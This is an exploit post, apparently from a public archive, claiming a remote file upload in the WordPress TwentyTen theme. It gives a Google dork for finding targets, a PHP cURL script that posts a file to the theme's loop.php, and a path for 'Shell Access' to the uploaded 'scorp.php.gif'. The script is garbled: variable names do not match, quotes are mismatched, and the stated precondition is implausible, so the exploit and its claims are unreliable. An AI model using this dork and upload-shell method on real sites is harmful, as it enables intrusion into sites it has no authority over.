##################################################
# Description : Wordpress Themes - TwentyTen Remote File Upload
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x
# Link : http://wordpress.org/extend/themes/twentyten
# Date : Friday, December 28, 2012
# Dork : inurl:/wp-content/themes/twentyten
##################################################
Fact :
this exploit only works if the LOOP_ARRAY functions are enabled in the server, which is disabled by default, although, if the administrator has ever configed the website, the array functions might've been enabled on by default, and cURL must be enabled too.
Exploit :
<?php
$uploadfile="scorp.php.gif";
$ch =
curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));
curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gif
Filename : $postResult output
scorp.php.gif
<?php
phpinfo();
?>
